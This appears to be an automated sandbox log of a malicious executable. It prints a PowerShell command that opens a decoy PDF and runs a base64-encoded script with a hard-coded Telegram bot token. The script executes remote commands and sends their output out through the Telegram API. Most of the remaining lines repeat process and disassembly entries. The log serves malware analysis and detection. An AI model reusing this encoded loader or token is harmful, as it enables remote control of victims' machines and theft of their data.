Source: C:\Users\user\Desktop\12.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\/file.pdf'; powershell.exe -e 'JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVA
Source: C:\Users\user\Desktop\12.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\/file.pdf'; powershell.exe -e 'JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B2B75 push ds; iretd 4_2_00007FFD9B8B2B76
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B2BAF push ds; iretd 4_2_00007FFD9B8B2BB0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B2B0A push ds; iretd 4_2_00007FFD9B8B2B0B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B30E8 push ds; iretd 4_2_00007FFD9B8B30E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B3122 push ds; iretd 4_2_00007FFD9B8B3123
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B3042 push ds; iretd 4_2_00007FFD9B8B3043
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B2F62 push ds; iretd 4_2_00007FFD9B8B2F6B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B2FA3 push ds; iretd 4_2_00007FFD9B8B2FA5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B37DC push ds; iretd 4_2_00007FFD9B8B37DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B36F8 push ds; iretd 4_2_00007FFD9B8B36FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B36BC push ds; iretd 4_2_00007FFD9B8B36BD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B2EC5 push ds; iretd 4_2_00007FFD9B8B2EC6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8AB6C2 push ds; iretd 4_2_00007FFD9B8AB6D2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B2DE5 push ds; iretd 4_2_00007FFD9B8B2DE6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B364E push ds; iretd 4_2_00007FFD9B8B364F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8A7567 push ebx; iretd 4_2_00007FFD9B8A756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B35A3 push ds; iretd 4_2_00007FFD9B8B35A5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B2D42 push ds; iretd 4_2_00007FFD9B8B2D43
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B2C5E push ds; iretd 4_2_00007FFD9B8B2C5F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B975D8F push ds; iretd 4_2_00007FFD9B975D91
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B975CCB push ds; iretd 4_2_00007FFD9B975CCD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
